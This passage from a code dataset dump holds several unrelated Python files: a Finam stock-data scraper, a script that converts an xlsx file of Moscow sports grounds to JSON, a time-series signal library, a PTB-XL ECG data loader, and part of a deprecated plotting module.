Parser:\n \"\"\"\n\n \"\"\"\n def __init__(self, ticker, from_, to_=None, split_period='month', is_feature=False, meta_df=None, subdata=False):\n \"\"\"\n\n :param ticker:\n :param from_:\n :param to_:\n :param split_period:\n :param is_feature:\n :param meta_df:\n :param subdata:\n \"\"\"\n self.ticker = ticker\n self.from_ = from_\n self.to_ = to_\n self.split_period = split_period\n self.is_feature = is_feature\n self.subdata = subdata\n self.short_code = {'BR': 'BR', 'BZ': 'BZ', 'NG': 'NG', 'PT': 'PLT',\n 'GD': 'GOLD', 'GC': 'GC', 'SV': 'SILV'}\n self.features_codes = dict(zip(range(12),\n ['F', 'G', 'H', 'J', 'K', 'M', 'N', 'Q', 'U', 'V', 'X', 'Z']))\n if self.to_:\n self.last_date_time = from_format(self.to_, 'DD.MM.YYYY HH:00:00', tz='Europe/Moscow')\n else:\n self.last_date_time = today(tz='Europe/Moscow')\n\n self.meta_information = meta_df\n self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}\n self.url_suffix = [('dtf', DTF), ('tmf', TMF), ('MSOR', MSOR), ('mstime', MSTIME),\n ('mstimever', MSTIMEVER), ('sep', SEP), ('sep2', SEP2), ('datf', DATF), ('at', AT)]\n\n self.ticker_horly_data = []\n\n def get_dates_by_period(self, from_, to_):\n \"\"\"\n\n :param from_:\n :param to_:\n :return:\n \"\"\"\n dates = []\n new_from_ = from_\n while True:\n if self.split_period == 'month':\n new_to_ = from_format(new_from_, 'DD.MM.YYYY HH:00:00').add(months=1).strftime('%d.%m.%Y %H:00:00')\n elif self.split_period == 'quarter':\n new_to_ = from_format(new_from_, 'DD.MM.YYYY HH:00:00').add(months=3).strftime('%d.%m.%Y %H:00:00')\n else:\n new_to_ = from_format(new_from_, 'DD.MM.YYYY HH:00:00').add(years=1).strftime('%d.%m.%Y %H:00:00')\n\n if pd.Timestamp(to_) < pd.Timestamp(new_to_):\n dates.append([new_from_, to_])\n break\n else:\n dates.append([new_from_, new_to_])\n new_from_ = new_to_\n return dates\n\n def get_url_period(self, ticker, start, end, code_name):\n \"\"\"\n\n :param ticker:\n :param start:\n :param end:\n :return:\n \"\"\"\n start_date = from_format(start, 'DD.MM.YYYY HH:00:00')\n end_date = from_format(end, 'DD.MM.YYYY HH:00:00')\n file_name = f'{ticker}_{start_date.strftime(\"%d%m%y\")}_{end_date.strftime(\"%d%m%y\")}'\n file_name_ext = '.txt'\n\n if self.is_feature:\n m = (start_date.month // 3 + 1) * 3 % 15 + ((start_date.month // 3 + 1) * 3 // 15) * 3\n code = f\"{self.ticker}{self.features_codes[m - 1]}{start_date.add(months=1).year % 10}\"\n name = f\"{self.short_code[self.ticker]}-{m}.{start_date.add(months=1).strftime('%y')}\"\n curr_df = self.meta_information[(self.meta_information['code'] == code) &\n (self.meta_information['name'].str.contains(name))]\n if curr_df.empty:\n return None\n else:\n code = self.ticker\n curr_df = self.meta_information[(self.ticker == self.meta_information[code_name]) &\n (self.meta_information['market'].isin([1, 5, 24, 25, 45]))]\n\n self.em = curr_df['id'].values[0]\n self.market = curr_df['market'].values[0]\n\n params = urlencode([('market', self.market), ('em', self.em), ('code', code), ('apply', APPLY),\n ('df', start_date.day), ('mf', start_date.month - 1), ('yf', start_date.year),\n ('from', start_date.strftime(\"%d.%m.%Y\")),\n ('dt', end_date.day), ('mt', end_date.month - 1), ('yt', end_date.year),\n ('to', end_date.strftime(\"%d.%m.%Y\")),\n ('p', PERIOD), ('f', file_name), ('e', file_name_ext), ('cn', code)] + self.url_suffix)\n\n url_period = FINAM_URL + file_name + f'{file_name_ext}?' + params\n return url_period\n\n def get_data_period(self, url):\n \"\"\"\n\n :param url:\n :return:\n \"\"\"\n query = Request(url)\n query.add_header('User-Agent', self.headers['User-Agent'])\n\n data_period = urlopen(query).readlines()\n\n return data_period\n\n def get_candles(self, code_name):\n \"\"\"\n\n :return:\n \"\"\"\n all_data = []\n for start, end in self.get_dates_by_period(self.from_, self.to_):\n\n url_period = self.get_url_period(self.ticker, start, end, code_name)\n if url_period:\n data_period = self.get_data_period(url_period)\n sleep(.5)\n all_data += data_period\n\n return all_data\n\n def get_all_data_as_df(self, all_data):\n \"\"\"\n\n :param all_data:\n :return:\n \"\"\"\n for h_data in all_data:\n h_data = h_data.strip().decode(\"utf-8\").split(',')\n y = int(h_data[2][:4])\n m = int(h_data[2][4:6])\n d = int(h_data[2][6:])\n h = int(h_data[3][:2])\n date_time = pd.Timestamp(datetime(y, m, d, h, 0, 0), tz='Europe/Moscow')\n if self.last_date_time < date_time:\n break\n if self.market in [5, 14, 17, 24, 25, 45]:\n start_time = 10\n end_time = 23\n else:\n start_time = 10\n end_time = 19\n\n if (date_time.hour >= start_time) and (date_time.hour < end_time):\n if self.subdata:\n self.ticker_horly_data.append([date_time.strftime('%Y-%m-%d %H:00:00'), float(h_data[7])])\n else:\n self.ticker_horly_data.append([date_time.strftime('%Y-%m-%d %H:00:00'),\n float(h_data[4]),\n float(h_data[5]),\n float(h_data[6]),\n float(h_data[7]),\n int(h_data[8])])\n return self.ticker_horly_data\n\n def parse(self, code_name='code'):\n \"\"\"\n\n :return:\n \"\"\"\n all_data = self.get_candles(code_name)\n return self.get_all_data_as_df(all_data)\n\n","repo_name":"Brutalfacepalm/investing","sub_path":"services/service_files/parser_data.py","file_name":"parser_data.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19090866193","text":"\"\"\"\nВам дан xlsx-файл с информацией о спортивных площадках в Москве.\nВам необходимо сдать на проверку json-файл, в котором будет храниться один словарь,\nключами которого будут административные округа (AdmArea), а значениями словари, в которых,\nв свою очередь, ключами будут названия районов (District), относящихся к этому административному округу,\nа значениями - списки адресов площадок (Address) в том порядке, в котором они встречались в исходном файле.\n\nВаш файл должен выглядеть примерно так:\n\n{\"Северо-Западный административный округ\": {\"район Строгино\": [\"улица Исаковского, дом 24, корпус 1\",\n\"Неманский проезд, дом 9\"], \"район Северное Тушино\": [\"улица Свободы, дом 56\", \"улица Свободы, дом 56\",\n\"улица Свободы, дом 56\", \"улица Свободы, дом 56\"], \"район Покровское-Стрешнево\": [\"Иваньковское шоссе, дом 6\"],\n\"район Щукино\": [\"Сосновая улица, дом 3, строение 2\"]}, ...}\n\"\"\"\nimport openpyxl\nimport json\n\n\nwb = openpyxl.load_workbook('data-25290-2019-10-30.xlsx')\nws = wb.active\nmain_dict = {}\n\nfor val in range(2, ws.max_row + 1):\n adm_area = ws.cell(row=val, column=5).value\n district = ws.cell(row=val, column=6).value\n address = ws.cell(row=val, column=7).value\n if adm_area not in main_dict:\n main_dict[adm_area] = {district: [address, ]}\n elif district not in main_dict[adm_area]:\n main_dict[adm_area].update({district: [address, ]})\n else:\n main_dict[adm_area][district].append(address)\n\nfout = open('sport_places.json', 'w', encoding='utf-8')\njson.dump(main_dict, fout)\nfout.close()\n","repo_name":"snlnrush/hse-python-analyze-data","sub_path":"Week9/task-4.py","file_name":"task-4.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"29380344884","text":"import pathlib\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nfrom signalai.tools.utils import join_dicts\n\n\nDTYPE_BYTES = {'float32': 4, 'float16': 2}\n\n\nclass TimeSeries:\n \"\"\"\n Stores either 1D signal or a 2D time-frequency transformation of a signal.\n First axis represents channel axis, the last one time axis.\n Operators:\n a + b - summing a and b\n a | b - joining channels of a and b\n a & b = concatenation of a and b\n \"\"\"\n full_dimensions = None\n\n def __init__(self, data_arr: np.ndarray = None, meta=None, time_map=None, fs: float = None):\n if meta is None:\n meta = {}\n\n if data_arr is not None and not isinstance(data_arr, np.ndarray):\n raise TypeError(f\"Unknown signal type {type(data_arr)}.\")\n\n if len(data_arr.shape) == (self.full_dimensions or 2) - 1: # channel axis missing\n data_arr = np.expand_dims(data_arr, axis=0)\n\n if self.full_dimensions is not None:\n if len(data_arr.shape) != self.full_dimensions:\n raise ValueError(f\"Type {type(self)} must have {self.full_dimensions} dimensions, not \"\n f\"{len(data_arr.shape)}.\")\n\n self.data_arr = data_arr\n\n if time_map is None:\n if self.data_arr is None:\n raise ValueError(\"Time map must be set when data_arr is None.\")\n self.time_map = np.ones((self.data_arr.shape[0], self.data_arr.shape[-1]), dtype=bool)\n else:\n self.time_map = time_map.astype(bool)\n\n if len(self.time_map.shape) == 1:\n self.time_map = np.expand_dims(self.time_map, axis=0)\n\n if len(self.time_map.shape) > 2:\n raise ValueError(f\"Data map must have one or two axes, not {len(self.time_map.shape)}.\")\n\n self.meta = meta.copy()\n self.fs = fs\n\n def crop(self, interval: tuple[int, int] = None):\n if interval is None:\n data_arr = self.data_arr\n time_map = self.time_map\n else:\n data_arr = self.data_arr[..., interval[0]:interval[1]]\n time_map = self.time_map[..., interval[0]:interval[1]]\n\n return type(self)(\n data_arr=data_arr,\n time_map=time_map,\n meta=self.meta,\n fs=self.fs,\n )\n\n def __len__(self):\n if self.data_arr is not None:\n return self.data_arr.shape[-1]\n\n return self.time_map.shape[-1]\n\n def astype_(self, dtype):\n self.data_arr = self.data_arr.astype(dtype)\n\n @property\n def channels_count(self):\n if self.data_arr is not None:\n return self.data_arr.shape[0]\n return self.time_map.shape[0]\n\n def take_channels(self, channels: list[set[int] | list[int] | int] = None):\n if channels is None:\n return self\n\n data_arrays = []\n time_maps = []\n for channel_gen in channels:\n if isinstance(channel_gen, set):\n channel_gen = int(np.random.choice(tuple(channel_gen)))\n\n if isinstance(channel_gen, int):\n data_arrays.append(self.data_arr[[channel_gen], ...])\n time_maps.append(self.time_map[[channel_gen], ...])\n elif isinstance(channel_gen, list) or isinstance(channel_gen, tuple):\n data_arrays.append(np.sum(self.data_arr[channel_gen, ...], axis=0))\n time_maps.append(np.any(self.time_map[channel_gen, ...], axis=0))\n else:\n raise TypeError(f\"Channel cannot be generated using type '{type(channel_gen)}'.\")\n\n return type(self)(\n data_arr=np.vstack(data_arrays),\n time_map=np.vstack(time_maps),\n meta=self.meta,\n fs=self.fs,\n )\n\n def trim(self, threshold=1e-5):\n first = np.min(np.argmax(np.abs(self.data_arr) > threshold, axis=1))\n last = len(self) - np.min(np.argmax(np.abs(self.data_arr[:, ::-1]) > threshold, axis=1))\n new_data_arr = self.data_arr[:, first: last]\n new_time_map = self.time_map[:, first: last]\n return type(self)(\n data_arr=new_data_arr.copy(),\n time_map=new_time_map.copy(),\n meta=self.meta.copy(),\n fs=self.fs,\n )\n\n def trim_(self, threshold=1e-5):\n first = np.min(np.argmax(np.abs(self.data_arr) > threshold, axis=1))\n last = len(self) - np.min(np.argmax(np.abs(self.data_arr[:, ::-1]) > threshold, axis=1))\n self.data_arr = self.data_arr[:, first: last]\n self.time_map = self.time_map[:, first: last]\n\n def margin_interval(self, interval_length: int = None, start_id=0):\n if interval_length is None:\n interval_length = len(self)\n\n if interval_length == len(self) and (start_id == 0 or start_id is None):\n return self\n\n new_data_arr = np.zeros((*self.data_arr.shape[:-1], interval_length), dtype=self.data_arr.dtype)\n new_time_map = np.zeros((self.data_arr.shape[0], interval_length), dtype=bool)\n\n if 0 < len(self) + start_id and start_id < interval_length:\n new_data_arr[..., max(0, start_id):min(interval_length, start_id + len(self))] = \\\n self.data_arr[..., max(0, -start_id):min(len(self), interval_length - start_id)]\n\n new_time_map[..., max(0, start_id):min(interval_length, start_id + len(self))] = \\\n self.time_map[..., max(0, -start_id):min(len(self), interval_length - start_id)]\n\n return type(self)(\n data_arr=new_data_arr,\n meta=self.meta,\n time_map=new_time_map,\n fs=self.fs,\n )\n\n def sum_channels(self):\n return type(self)(\n data_arr=np.sum(self.data_arr, axis=0),\n time_map=np.sum(self.time_map, axis=0),\n meta=self.meta,\n fs=self.fs,\n )\n\n def apply(self, func):\n return type(self)(\n data_arr=func(self.data_arr),\n meta=self.meta,\n time_map=self.time_map,\n fs=self.fs,\n )\n\n def __add__(self, other):\n if isinstance(other, type(self)):\n if len(self) != len(other):\n raise ValueError(f\"Adding signals with different lengths is forbidden (for a good reason). \"\n f\"{len(self)}, {len(other)}\")\n\n if (not (self.fs is None and other.fs is None)) and self.fs != other.fs:\n raise ValueError(\"Adding signals with different fs is forbidden (for a good reason).\")\n\n new_data_arr = self.data_arr + other.data_arr\n new_info = join_dicts(self.meta, other.meta)\n new_time_map = self.time_map | other.time_map\n\n else:\n new_data_arr = self.data_arr + other\n new_info = self.meta\n new_time_map = self.time_map.copy()\n\n return type(self)(\n data_arr=new_data_arr,\n meta=new_info,\n time_map=new_time_map,\n fs=self.fs,\n )\n\n def __and__(self, other):\n if isinstance(other, type(self)):\n other_ts = other\n new_info = join_dicts(self.meta, other.meta)\n else:\n other_ts = type(self)(other)\n new_info = self.meta\n\n if (not (self.fs is None and other.fs is None)) and self.fs != other.fs:\n raise ValueError(\"Joining signals with different fs is forbidden (for a good reason).\")\n\n new_data_arr = np.concatenate([self.data_arr, other_ts.data_arr], axis=-1)\n new_time_map = np.concatenate([self.time_map, other_ts.time_map], axis=-1)\n\n return type(self)(\n data_arr=new_data_arr,\n meta=new_info,\n time_map=new_time_map,\n fs=self.fs,\n )\n\n def __or__(self, other):\n if isinstance(other, type(self)):\n other_ts = other\n new_info = join_dicts(self.meta, other.meta)\n else:\n other_ts = type(self)(other)\n new_info = self.meta\n\n if len(self) != len(other):\n raise ValueError(f\"Joining signals with different lengths is forbidden (for a good reason). \"\n f\"{len(self)}, {len(other)}\")\n\n if (not (self.fs is None and other.fs is None)) and self.fs != other.fs:\n raise ValueError(f\"Joining signals with different fs is forbidden (for a good reason), {self.fs}, {other.fs}.\")\n\n new_data_arr = np.concatenate([self.data_arr, other_ts.data_arr], axis=0)\n new_time_map = np.concatenate([self.time_map, other_ts.time_map], axis=0)\n\n return type(self)(\n data_arr=new_data_arr,\n meta=new_info,\n time_map=new_time_map,\n fs=self.fs,\n )\n\n def __mul__(self, other):\n return type(self)(\n data_arr=self.data_arr * other,\n meta=self.meta,\n time_map=self.time_map,\n fs=self.fs,\n )\n\n def __truediv__(self, other):\n return type(self)(\n data_arr=self.data_arr / other,\n meta=self.meta,\n time_map=self.time_map,\n fs=self.fs,\n )\n\n def __eq__(self, other):\n return (np.all(self.data_arr == other.data_arr) and\n np.all(self.data_arr.shape == other.data_arr.shape) and\n self.meta == other.meta and\n np.all(self.time_map == other.time_map) and\n ((self.fs is None and other.fs is None) or self.fs == other.fs))\n\n def __repr__(self):\n return str(pd.DataFrame.from_dict(\n self.meta | {'length': len(self), 'channels': self.channels_count, 'fs': self.fs},\n orient='index', columns=['value'],\n ))\n\n def update_meta(self, dict_):\n self.meta = self.meta.copy()\n self.meta.update(dict_)\n\n\nclass Signal(TimeSeries):\n full_dimensions = 2\n\n def show(self, channels=0, figsize=(16, 3)):\n plt.figure(figsize=figsize)\n plt.plot(self.data_arr[channels])\n plt.show()\n\n def spectrogram(self, figsize=(16, 9), save_as=None, show=True):\n from scipy import signal as scipy_signal\n plt.figure(figsize=figsize)\n f, t, sxx = scipy_signal.spectrogram(self.data_arr[0], self.fs)\n sxx = np.sqrt(sxx)\n plt.pcolormesh(t, f, sxx, shading='gouraud')\n plt.ylabel('Frequency [Hz]')\n plt.xlabel('Time [sec]')\n if save_as is not None:\n plt.savefig(save_as)\n if show:\n plt.show()\n\n def spectrogram3(self, figsize=(16, 9), save_as=None, show=True):\n import librosa\n plt.figure(figsize=figsize)\n sxx = np.abs(librosa.stft(self.data_arr[0, ::2], center=False, n_fft=2048, hop_length=1024))\n sxx = sxx / np.max(sxx)\n print(sxx.shape, np.max(sxx), np.min(sxx))\n plt.pcolormesh(sxx, shading='gouraud')\n plt.ylabel('Frequency [Hz]')\n plt.xlabel('Time [sec]')\n if save_as is not None:\n plt.savefig(save_as)\n if show:\n plt.show()\n\n def spectrogram2(self):\n import librosa\n from librosa.display import specshow\n s = np.abs(librosa.stft(self.data_arr[0]))\n fig, ax = plt.subplots()\n\n img = specshow(librosa.amplitude_to_db(s, ref=np.max),\n y_axis='log', x_axis='time', sr=self.fs, ax=ax)\n ax.set_title('Power spectrogram')\n fig.colorbar(img, ax=ax, format=\"%+2.0f dB\")\n\n def play(self, channel_id=0, fs: float = None, volume=32):\n import sounddevice as sd\n fs = fs or self.fs\n sd.play(volume * self.data_arr[channel_id].astype('float32'), fs)\n sd.wait()\n\n def to_mp3(self, file, normalized=True, fs=None):\n import pydub\n \"\"\"\n set fs to 44100 if you want\n \"\"\"\n if self.data_arr.ndim not in [1, 2]:\n raise ValueError(f\"This signal has '{self.data_arr.ndim}' channels. Allowed values are 1 or 2.\")\n if normalized: # normalized array - each item should be a float in [-1, 1)\n y = np.int16(self.data_arr.T * 2 ** 15)\n else:\n y = np.int16(self.data_arr.T)\n if fs is None:\n fs = self.fs\n song = pydub.AudioSegment(y.tobytes(), frame_rate=fs, sample_width=2, channels=self.data_arr.shape[0])\n song.export(file, format=\"mp3\", bitrate=\"320k\")\n\n\nclass Signal2D(TimeSeries):\n full_dimensions = 3\n\n def show(self):\n ...\n\n\ndef sum_time_series(series: list[TimeSeries]) -> TimeSeries:\n if len(series) == 0:\n raise ValueError\n elif len(series) == 1:\n return series[0]\n\n ts0 = series[0]\n for ts in series[1:]:\n ts0 = ts0 + ts\n\n return ts0\n\n\ndef stack_time_series(series: list[TimeSeries]) -> TimeSeries:\n new_info = join_dicts(*[i.meta for i in series])\n data_arrs = []\n time_maps = []\n length = len(series[0])\n fs = series[0].fs\n for i in series:\n assert len(i) == length\n assert i.fs is fs or i.fs == fs\n data_arrs.append(i.data_arr)\n time_maps.append(i.time_map)\n\n new_data_arr = np.concatenate(data_arrs, axis=0)\n new_time_map = np.concatenate(time_maps, axis=0)\n\n return type(series[0])(\n data_arr=new_data_arr,\n meta=new_info,\n time_map=new_time_map,\n fs=fs,\n )\n\n\ndef join_time_series(series: list[TimeSeries]) -> TimeSeries:\n new_info = join_dicts(*[i.meta for i in series])\n data_arrs = []\n time_maps = []\n channels_count = series[0].channels_count\n fs = series[0].fs\n for i in series:\n assert i.channels_count == channels_count\n assert i.fs is fs or i.fs == fs\n data_arrs.append(i.data_arr)\n time_maps.append(i.time_map)\n\n new_data_arr = np.concatenate(data_arrs, axis=-1)\n new_time_map = np.concatenate(time_maps, axis=-1)\n\n return type(series[0])(\n data_arr=new_data_arr,\n meta=new_info,\n time_map=new_time_map,\n fs=fs,\n )\n\n\ndef audio_file2numpy(file) -> tuple[np.ndarray, int]:\n from pydub import AudioSegment\n from pydub.utils import mediainfo\n file = Path(file)\n suffix = file.suffix\n file = str(file.absolute())\n if suffix == '.wav':\n audio = AudioSegment.from_wav(file)\n elif suffix == '.mp3':\n audio = AudioSegment.from_mp3(file)\n elif suffix == '.aac':\n audio = AudioSegment.from_file(file, \"aac\")\n else:\n raise TypeError(f\"Suffix '{suffix}' is not supported yet!\")\n\n np_audio = np.array(audio.get_array_of_samples(), dtype=np.float32).reshape((-1, audio.channels)) / (\n 1 << (8 * audio.sample_width - 1)), audio.frame_rate\n return np_audio[0].T, int(mediainfo(file)['sample_rate'])\n\n\ndef read_audio(filename, interval: tuple[int, int] = None, dtype=None, fs: float = None, meta=None) -> Signal:\n \n data_arr, fs_ = audio_file2numpy(filename)\n if fs is not None and fs != fs_:\n raise ValueError(f'fs is wrong in config (from config) {fs}!={fs_} (from audio)')\n if dtype is not None:\n data_arr = data_arr.astype(dtype)\n\n s = Signal(data_arr=data_arr, fs=fs_, meta=meta)\n if interval is not None:\n return s.crop(interval)\n\n return s\n\n\ndef read_bin(filename, interval: tuple[int, int] = None, source_dtype='float32', dtype=None, meta=None,\n fs: float = None) -> Signal:\n with open(filename, \"rb\") as f:\n start_byte = int(DTYPE_BYTES[source_dtype] * interval[0]) if interval is not None else 0\n assert start_byte % DTYPE_BYTES[source_dtype] == 0, \"Bytes are not loading properly.\"\n f.seek(start_byte, 0)\n count = (interval[1] - interval[0]) if interval is not None else -1\n data_arr = np.expand_dims(np.fromfile(f, dtype=source_dtype, count=count), axis=0)\n if dtype is not None:\n data_arr = data_arr.astype(dtype)\n return Signal(data_arr=data_arr, meta=meta, fs=fs)\n\n\ndef from_numpy(data_arr: np.ndarray, interval: tuple[int, int] = None, dtype=None, fs: float = None, meta=None) -> TimeSeries:\n assert isinstance(data_arr, np.ndarray), f\"data_arr must be a numpy.ndarray, not '{type(data_arr)}'\"\n if len(data_arr.shape) == 1:\n data_arr = np.expand_dims(data_arr, axis=0)\n if interval is not None:\n data_arr = data_arr[..., interval[0]: interval[1]]\n if dtype is not None:\n data_arr = data_arr.astype(dtype)\n\n if len(data_arr.shape) == 2:\n return Signal(data_arr=data_arr, meta=meta, fs=fs)\n elif len(data_arr.shape) == 3:\n return Signal2D(data_arr=data_arr, meta=meta, fs=fs)\n else:\n raise ValueError(f\"Loaded array has {len(data_arr.shape)} channels, maximum is 3.\")\n\n\ndef read_npy(filename: str | pathlib.PosixPath, interval: tuple[int, int] = None, dtype=None, fs: float = None, meta=None) -> TimeSeries:\n full_data_arr = np.load(filename)\n return from_numpy(\n data_arr=full_data_arr,\n interval=interval,\n dtype=dtype,\n fs=fs,\n meta=meta,\n )\n","repo_name":"AIKovanda/signalai","sub_path":"src/signalai/time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":17029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"23726085936","text":"import ast\nimport numpy as np\nimport wfdb\nimport pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder, MinMaxScaler\nimport os\nimport joblib\n\ndef loadDatabase(csv:str) -> pd.DataFrame:\n \"\"\"\n Renvoie un Dataframe à partir du fichier base de donnée csv ptbxl\n \"\"\"\n df = pd.read_csv(csv, index_col='ecg_id', header=0)\n df.scp_codes = df.scp_codes.apply(lambda x: ast.literal_eval(x)) # eval json array\n return df\n\ndef loadSample(path:str, df: pd.DataFrame, samplerate=100):\n \"\"\"\n Renvoie un tableau de tableau des signaux de tous les patients et les metadonnées\n [[patient1], [patient2], ...]\n [patient1] = [[I], [II], ..., [V3]]\n \"\"\"\n if samplerate == 100:\n data = [wfdb.rdsamp(path+f) for f in df.filename_lr]\n elif samplerate == 500:\n data = [wfdb.rdsamp(path+f) for f in df.filename_hr]\n else:\n return Exception('Invalid parameter ' + str(samplerate))\n raw = []\n metas = []\n for signal, meta in data:\n #raw.append(np.array(signal).flatten(order='F').reshape(meta['n_sig'], meta['sig_len']))\n raw.append(signal)\n metas.append(meta)\n return (np.array(raw), np.array(metas))\n\ndef loadStatement(csv:str):\n \"\"\"\n Load statement\n \"\"\"\n df = pd.read_csv(csv, index_col=None)\n return df\n\ndef createYArray(statement:pd.DataFrame, db:pd.DataFrame, save_dir='./', use_only_diag=True, use_most=-1):\n \"\"\"One-hot encode les diagnostics -> un vecteur de dimension 71 pour chaque diag\n Sauvergarde l'encodeur pour décoder la prédiction\n\n Args:\n statement (pd.DataFrame): Les diagnostics\n db (pd.DataFrame): La base de donnés en csv\n save_dir (str, optional): Le dossier de sauvegarde. Defaults to 'cache/'.\n\n Returns:\n np.array: Un tableau de tableau de vecteurs de dimension len(statement)\n \"\"\"\n if os.path.exists(save_dir) == False:\n os.mkdir(save_dir)\n\n if use_only_diag:\n statement = statement[statement.diagnostic == 1]\n\n #create list of most 'used' labels and take use_most of them\n only_labels=[]\n if use_most > 0:\n freq = {}\n for codes in db.scp_codes:\n mk = max(codes, key=codes.get)\n if mk in freq:\n freq[mk] += 1\n else:\n freq[mk] = 1\n freq = sorted(freq.items(), key=lambda item: item[1], reverse=True)\n for i in range(use_most):\n only_labels.append(freq[i][0])\n only_labels.append('OTHER')\n\n enc = OneHotEncoder()\n labels = statement.iloc[:,0].to_numpy() if not only_labels else np.array(only_labels)\n enc.fit(labels.reshape(-1, 1))\n\n joblib.dump(enc, save_dir+'encoder.save')\n\n Y = []\n for codes in db.scp_codes:\n tmp = np.zeros(len(labels))\n max_key = max(codes, key=codes.get)\n if max_key in labels:\n tmp = np.add(tmp, enc.transform([[max_key]]).toarray()[0])\n else:\n tmp = np.add(tmp, enc.transform([['OTHER']]).toarray()[0])\n #for key in codes.keys():\n # if key in labels:\n # tmp = np.add(tmp, enc.transform([[key]]).toarray()[0] * codes[key] / 100)\n # else:\n # tmp += enc.transform([['NORM']])\n Y.append(tmp)\n\n return np.array(Y)\n\ndef collectData(db_dir, samples_file, metas_file, y_file, use_saved=True, use_most=-1):\n \"\"\"Charge les données à partir de celles sauvergardés ou en les créant\n\n Args:\n db_dir (str): dossier de la base de donnée\n samples_file (str): emplacement du fichier de sauvegarde des samples\n metas_file (str): emplacement du fichier de sauvegarde des metadonnés\n y_file (str): emplacement du fichier de sauvergarde des labels\n use_saved (bool, optional): Utilise ou non la sauvegarde. Defaults to True.\n\n Returns:\n Tuple: Renvoie les samples, labels et métadonnés\n \"\"\"\n db = loadDatabase(db_dir + 'ptbxl_database.csv')\n stat = loadStatement(db_dir + 'scp_statements.csv')\n\n # Charge les données déjà traitées si elles existent\n\n if use_saved and os.path.exists(samples_file):\n print('Chargement des données ', end='', flush=True)\n\n samples = joblib.load(samples_file)\n metas = joblib.load(metas_file)\n Y = joblib.load(y_file)\n print('[OK]')\n else:\n print('Création des données ', end='', flush=True)\n samples, metas = loadSample(db_dir, db)\n Y = createYArray(stat, db, use_most=use_most)\n joblib.dump(samples, samples_file, compress=3)\n joblib.dump(metas, metas_file)\n joblib.dump(Y, y_file, compress=3)\n print('[OK]')\n ######################################################################\n\n return samples, Y, metas","repo_name":"DrBlackApple/TIPE","sub_path":"databuilder.py","file_name":"databuilder.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21340437782","text":"## NB: this module is deprecated and will be removed soon\n\n# all necessary (available) output functions are in output_disease and output_statistics\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntry:\n import brewer2mpl as brew\n\n colors = ['k'] + brew.get_map('Dark2', 'qualitative', 8).mpl_colors # Set1\nexcept ImportError:\n colors = ['b', 'r', 'g', 'm', 'c', 'k', '0.5']\n\n\nclass lp(object):\n lw = 1\n\n\n## general / helper functions # - # - # - # - # - # - # - # - # - # - # - # \n\ndef setup_x_axis_years(ax, times, offset=0, set_xlim=True):\n #print \"s\", offset\n years_per_tick = (times['et'] - times['st']) / (times['t_per_year'] * 5)\n # why is this divided by 10?, it produces an error if want a range of less than 10 years [can't work out why]\n if set_xlim:\n ax.set_xlim(times['st'], times['et'])\n ax.set_xticks(list(range(times['st'],\n times['et'] + (times['t_per_year'] * years_per_tick),\n times['t_per_year'] * years_per_tick)))\n ax.set_xticklabels(list(range(offset + times['st'] / times['t_per_year'],\n offset + times['et'] / times['t_per_year'] + 1,\n years_per_tick)))\n ax.set_xlabel('Year')\n\n\ndef setup_x_axis_days(ax, times, xmin=0):\n days_per_tick = (times['et'] - times['st']) / (times['t_per_year'] / 364.0 * 6)\n ax.set_xlim(times['st'], times['et'])\n t_per_day = times['t_per_year'] / 364.0\n xtics = np.arange(times['st'], times['et'], t_per_day * days_per_tick, dtype=np.int)\n ax.set_xticks(xtics)\n xticlabels = xtics - times['st'] + (xmin if xmin else 0) # effectively, handle offset\n xticlabels /= t_per_day\n ax.set_xticklabels(xticlabels)\n ax.set_xlabel('Day')\n\n\ndef setup_x_axis(ax, times, xmin=0, set_xlim=True):\n # if duration is less than one year, show x axis as days\n if times['et'] - times['st'] <= times['t_per_year']:\n setup_x_axis_days(ax, times, xmin)\n else:\n setup_x_axis_years(ax, times, xmin, set_xlim)\n\n\n## OLD functions # - # - # - # - # - # - # - # - # - # - # - # - # - # - # - #\n\ndef plot_infection(ax, series, y_errs, start_index, end_index,\n start_time, end_time, ylabel=\"Proportion infected\", interval=1):\n print(\"************* SUPERCEDED BY output_timeseries\")\n\n xvals = np.linspace(start_time, end_time, len(series[0]))\n for i, cur_counts in enumerate(series):\n print((len(yvals)))\n if len(yvals) < len(xvals):\n yvals.extend([0] * (len(xvals) - len(yvals)))\n ax.plot(xvals, yvals, color=colors[i], lw=lp.lw)\n ax.set_ylabel(ylabel)\n\n\ndef plot_infection_multi(ax, inc_mean, inc_std, start_index, end_index,\n start_time, end_time, t_dur, label=\"\", color='k'):\n print(\"************* SUPERCEDED BY output_timeseries\")\n\n yvals = list(inc_mean[start_index:end_index])\n xvals = list(range(start_time, end_time, t_dur))\n yerr = list(inc_std[start_index:end_index])\n if len(yvals) < len(xvals):\n yvals.extend([0] * (len(xvals) - len(yvals)))\n if len(yerr) < len(xvals):\n yerr.extend([0] * (len(xvals) - len(yerr)))\n ax.errorbar(xvals, yvals, label=label, yerr=yerr, color=color)\n ax.set_ylim(ymin=0.0)\n ax.set_ylabel('Incidence')\n\n\ndef plot_vaccine_coverage(ax, data, start_time, end_time, t_per_year, start_index,\n logscale=False):\n print(\"************* SUPERCEDED BY output_timeseries\")\n\n # print \"%%% IN plot_vaccine_coverage %%%\"\n # print start_index\n #print start_time, end_time \n xvals = list(range(start_time, end_time, t_per_year))\n #print xvals\n #print len(xvals)\n for cur_cov in data:\n #print cur_cov[0]\n yvals = cur_cov[1][start_index:]\n #print len(yvals)\n ax.plot(xvals, yvals, label=cur_cov[0])\n if logscale: ax.set_yscale('log')\n ax.set_ylabel('Coverage')\n ax.set_ylim((0, 1))\n leg = ax.legend(loc=2)\n 